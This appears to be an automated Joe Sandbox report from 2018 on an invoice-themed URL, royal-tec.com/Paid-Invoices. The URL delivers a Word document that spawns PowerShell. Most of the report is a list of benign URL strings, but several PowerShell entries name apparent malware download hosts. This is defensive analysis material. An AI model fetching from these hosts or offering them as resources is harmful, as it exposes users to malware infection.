Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	46214
Start time:	21:33:44
Joe Sandbox Product:	CloudBasic
Start date:	12.02.2018
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://royal-tec.com/Paid-Invoices
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Detection:	MAL
Classification:	mal72.evad.expl.win@11/29@8/3
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
HDC Information:	Failed
Cookbook Comments:	Adjust boot time URL browsing timeout
Warnings:	Show All Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	72	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Browser exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Networking:

Downloads files

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid-Invoices[1].doc

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /Paid-Invoices HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: royal-tec.comDNT: 1Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Paid-Invoices/ HTTP/1.1Accept: text/html, application/xhtml+xml, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: royal-tec.comConnection: Keep-AliveDNT: 1

Found strings which match to known social media urls

Show sources

Source: iexplore.exe	String found in binary or memory: <SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: iexplore.exe	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: iexplore.exe	String found in binary or memory: <URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)
Source: iexplore.exe	String found in binary or memory: <URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.dr	String found in binary or memory: <domain uaString="11">messenger.yahoo.com</domain> equals www.yahoo.com (Yahoo)
Source: iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.dr	String found in binary or memory: <domain uaString="Firefox Token NoPlat">login.yahoo.com</domain> equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: Free Hotmail.url equals www.hotmail.com (Hotmail)
Source: iexplore.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: royal-tec.com

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: iexplore.exe, powershell.exe	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///$
Source: WINWORD.EXE	String found in binary or memory: file:///C:
Source: WINWORD.EXE	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Conte
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/T
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/en-US/Microsoft.PowerShell.ConsoleHost.resources/
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/o
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.config
Source: ver40A7.tmp.1.dr	String found in binary or memory: http://
Source: iexplore.exe	String found in binary or memory: http://%s.com
Source: iexplore.exe	String found in binary or memory: http://Trn
Source: powershell.exe	String found in binary or memory: http://about.megaxus.com/v1/images/article/IpjKJT/
Source: iexplore.exe	String found in binary or memory: http://amazon.fr/
Source: iexplore.exe	String found in binary or memory: http://api.bing.com/qsml.aspx?query=
Source: iexplore.exe	String found in binary or memory: http://ariadna.elmundo.es/
Source: iexplore.exe	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://arianna.libero.it/
Source: iexplore.exe	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://asp.usatoday.com/
Source: iexplore.exe	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://auone.jp/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: iexplore.exe	String found in binary or memory: http://br.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://browse.guardian.co.uk/
Source: iexplore.exe	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://busca.buscape.com.br/
Source: iexplore.exe	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://busca.igbusca.com.br/
Source: iexplore.exe	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://busca.orange.es/
Source: iexplore.exe	String found in binary or memory: http://busca.uol.com.br/
Source: iexplore.exe	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://buscador.lycos.es/
Source: iexplore.exe	String found in binary or memory: http://buscador.terra.com.br/
Source: iexplore.exe	String found in binary or memory: http://buscador.terra.com/
Source: iexplore.exe	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://buscador.terra.es/
Source: iexplore.exe	String found in binary or memory: http://buscar.ozu.es/
Source: iexplore.exe	String found in binary or memory: http://buscar.ya.com/
Source: iexplore.exe	String found in binary or memory: http://busqueda.aol.com.mx/
Source: iexplore.exe	String found in binary or memory: http://cerca.lycos.it/
Source: iexplore.exe	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: iexplore.exe	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: iexplore.exe	String found in binary or memory: http://cn.bing.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://cn.bing.com/search?q=
Source: iexplore.exe	String found in binary or memory: http://cnet.search.com/
Source: iexplore.exe	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: iexplore.exe	String found in binary or memory: http://corp.naukri.com/
Source: iexplore.exe	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://crl.comodo.net//J
Source: iexplore.exe	String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: iexplore.exe	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: iexplore.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: iexplore.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: iexplore.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: iexplore.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: iexplore.exe	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: iexplore.exe	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: iexplore.exe	String found in binary or memory: http://crt.comodoca.com/
Source: iexplore.exe	String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: iexplore.exe	String found in binary or memory: http://cs.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://cs.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://cs.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: iexplore.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: iexplore.exe	String found in binary or memory: http://de.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://de.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://de.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://de.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://en.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://en.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://en.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: powershell.exe	String found in binary or memory: http://er
Source: powershell.exe	String found in binary or memory: http://ers
Source: Paid Invoice.doc.usc4tz8.partial.1.dr	String found in binary or memory: http://ersmgY
Source: powershell.exe	String found in binary or memory: http://erst
Source: powershell.exe	String found in binary or memory: http://erste.vip/nH0tN/
Source: iexplore.exe	String found in binary or memory: http://es.ask.com/
Source: iexplore.exe	String found in binary or memory: http://es.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://es.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://es.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://es.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: iexplore.exe	String found in binary or memory: http://espanol.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://espn.go.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://find.joins.com/
Source: iexplore.exe	String found in binary or memory: http://fr.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://fr.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://fr.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://fr.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://google.pchome.com.tw/
Source: iexplore.exe	String found in binary or memory: http://home.altervista.org/
Source: iexplore.exe	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: iexplore.exe	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: iexplore.exe	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: iexplore.exe	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: iexplore.exe	String found in binary or memory: http://images.monster.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: iexplore.exe	String found in binary or memory: http://in.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://it.search.dada.net/
Source: iexplore.exe	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://it.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://it.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://it.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://it.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://ja.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://ja.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://ja.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: powershell.exe	String found in binary or memory: http://java.com/
Source: powershell.exe	String found in binary or memory: http://java.com/help
Source: powershell.exe	String found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exe	String found in binary or memory: http://java.com/http://java.com/
Source: iexplore.exe	String found in binary or memory: http://jobsearch.monster.com/
Source: iexplore.exe	String found in binary or memory: http://kr.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://list.taobao.com/
Source: iexplore.exe	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: iexplore.exe	String found in binary or memory: http://m
Source: iexplore.exe	String found in binary or memory: http://mail.live.com/
Source: iexplore.exe	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: iexplore.exe	String found in binary or memory: http://msk.afisha.ru/
Source: iexplore.exe	String found in binary or memory: http://nl.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://nl.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://nl.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: WINWORD.EXE	String found in binary or memory: http://ns.
Source: iexplore.exe	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: iexplore.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: iexplore.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: iexplore.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: iexplore.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: iexplore.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: iexplore.exe, 6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.0.dr, 6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04.1.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: iexplore.exe	String found in binary or memory: http://ocsp.digicert.com0:
Source: iexplore.exe	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: iexplore.exe	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlVE
Source: iexplore.exe	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlf
Source: iexplore.exe	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crllE
Source: iexplore.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: iexplore.exe	String found in binary or memory: http://ocsp.entrust.net0D
Source: iexplore.exe	String found in binary or memory: http://ocsp.msocsp.com0
Source: iexplore.exe	String found in binary or memory: http://ocsp?J
Source: iexplore.exe	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: iexplore.exe	String found in binary or memory: http://p.zhongsou.com/
Source: iexplore.exe	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://pl.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://pl.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://pl.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://price.ru/
Source: iexplore.exe	String found in binary or memory: http://price.ru/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://pt.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://pt.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://pt.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://recherche.linternaute.com/
Source: iexplore.exe	String found in binary or memory: http://recherche.tf1.fr/
Source: iexplore.exe	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://rover.ebay.com
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices
Source: iexplore.exe, Paid-Invoices[1].htm.1.dr	String found in binary or memory: http://royal-tec.com/Paid-Invoices/
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices/#
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices/(
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices/3
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices/:
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices/C:
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices/N
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-Invoices5
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-InvoicesB
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-InvoicesH
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/Paid-InvoiceshTerms
Source: iexplore.exe	String found in binary or memory: http://royal-tec.com/h
Source: iexplore.exe	String found in binary or memory: http://ru.search.yahoo.com
Source: iexplore.exe	String found in binary or memory: http://ru.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://ru.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://ru.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://sads.myspace.com/
Source: iexplore.exe	String found in binary or memory: http://search-dyn.tiscali.it/
Source: iexplore.exe	String found in binary or memory: http://search.about.com/
Source: iexplore.exe	String found in binary or memory: http://search.alice.it/
Source: iexplore.exe	String found in binary or memory: http://search.alice.it/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.aol.co.uk/
Source: iexplore.exe	String found in binary or memory: http://search.aol.com/
Source: iexplore.exe	String found in binary or memory: http://search.aol.in/
Source: iexplore.exe	String found in binary or memory: http://search.atlas.cz/
Source: iexplore.exe	String found in binary or memory: http://search.auction.co.kr/
Source: iexplore.exe	String found in binary or memory: http://search.auone.jp/
Source: iexplore.exe	String found in binary or memory: http://search.books.com.tw/
Source: iexplore.exe	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.centrum.cz/
Source: iexplore.exe	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.chol.com/
Source: iexplore.exe	String found in binary or memory: http://search.chol.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.cn.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://search.daum.net/
Source: iexplore.exe	String found in binary or memory: http://search.daum.net/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.dreamwiz.com/
Source: iexplore.exe	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.ebay.co.uk/
Source: iexplore.exe	String found in binary or memory: http://search.ebay.com/
Source: iexplore.exe	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.ebay.de/
Source: iexplore.exe	String found in binary or memory: http://search.ebay.es/
Source: iexplore.exe	String found in binary or memory: http://search.ebay.fr/
Source: iexplore.exe	String found in binary or memory: http://search.ebay.in/
Source: iexplore.exe	String found in binary or memory: http://search.ebay.it/
Source: iexplore.exe	String found in binary or memory: http://search.empas.com/
Source: iexplore.exe	String found in binary or memory: http://search.empas.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.espn.go.com/
Source: iexplore.exe	String found in binary or memory: http://search.gamer.com.tw/
Source: iexplore.exe	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.gismeteo.ru/
Source: iexplore.exe	String found in binary or memory: http://search.goo.ne.jp/
Source: iexplore.exe	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.hanafos.com/
Source: iexplore.exe	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.interpark.com/
Source: iexplore.exe	String found in binary or memory: http://search.ipop.co.kr/
Source: iexplore.exe	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: iexplore.exe	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: iexplore.exe	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: iexplore.exe	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: iexplore.exe	String found in binary or memory: http://search.livedoor.com/
Source: iexplore.exe	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.lycos.co.uk/
Source: iexplore.exe	String found in binary or memory: http://search.lycos.com/
Source: iexplore.exe	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: iexplore.exe	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: iexplore.exe	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: iexplore.exe	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: iexplore.exe	String found in binary or memory: http://search.nate.com/
Source: iexplore.exe	String found in binary or memory: http://search.naver.com/
Source: iexplore.exe	String found in binary or memory: http://search.naver.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.nifty.com/
Source: iexplore.exe	String found in binary or memory: http://search.orange.co.uk/
Source: iexplore.exe	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.rediff.com/
Source: iexplore.exe	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.seznam.cz/
Source: iexplore.exe	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.sify.com/
Source: iexplore.exe	String found in binary or memory: http://search.yahoo.co.jp
Source: iexplore.exe	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: iexplore.exe	String found in binary or memory: http://search.yam.com/
Source: iexplore.exe	String found in binary or memory: http://search1.taobao.com/
Source: iexplore.exe	String found in binary or memory: http://search2.estadao.com.br/
Source: iexplore.exe	String found in binary or memory: http://searchresults.news.com.au/
Source: iexplore.exe	String found in binary or memory: http://service2.bfast.com/
Source: iexplore.exe	String found in binary or memory: http://si.wikipedia.org/
Source: iexplore.exe	String found in binary or memory: http://si.wikipedia.org/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://si.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: iexplore.exe	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: iexplore.exe	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: iexplore.exe	String found in binary or memory: http://suche.aol.de/
Source: iexplore.exe	String found in binary or memory: http://suche.freenet.de/
Source: iexplore.exe	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://suche.lycos.de/
Source: iexplore.exe	String found in binary or memory: http://suche.t-online.de/
Source: iexplore.exe	String found in binary or memory: http://suche.web.de/
Source: iexplore.exe	String found in binary or memory: http://suche.web.de/favicon.ico
Source: powershell.exe	String found in binary or memory: http://tceele.com/NCbJ/
Source: iexplore.exe	String found in binary or memory: http://treyresearch.net
Source: iexplore.exe	String found in binary or memory: http://tw.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://udn.com/
Source: iexplore.exe	String found in binary or memory: http://udn.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://uk.ask.com/
Source: iexplore.exe	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://uk.search.yahoo.com/
Source: iexplore.exe	String found in binary or memory: http://vachercher.lycos.fr/
Source: iexplore.exe	String found in binary or memory: http://video.globo.com/
Source: iexplore.exe	String found in binary or memory: http://video.globo.com/favicon.ico
Source: WINWORD.EXE	String found in binary or memory: http://w
Source: iexplore.exe	String found in binary or memory: http://web.ask.com/
Source: iexplore.exe	String found in binary or memory: http://www.%s.com
Source: iexplore.exe	String found in binary or memory: http://www.abril.com.br/
Source: iexplore.exe	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.alarabiya.net/
Source: iexplore.exe	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.amazon.co.jp/
Source: iexplore.exe	String found in binary or memory: http://www.amazon.co.uk/
Source: iexplore.exe	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: iexplore.exe	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: iexplore.exe	String found in binary or memory: http://www.amazon.de/
Source: iexplore.exe	String found in binary or memory: http://www.aol.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.arrakis.com/
Source: iexplore.exe	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.asharqalawsat.com/
Source: iexplore.exe	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: iexplore.exe	String found in binary or memory: http://www.ask.com/
Source: iexplore.exe	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: iexplore.exe	String found in binary or memory: http://www.baidu.com/
Source: iexplore.exe	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: iexplore.exe, iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.dr	String found in binary or memory: http://www.bing.com/bingbot.htm)
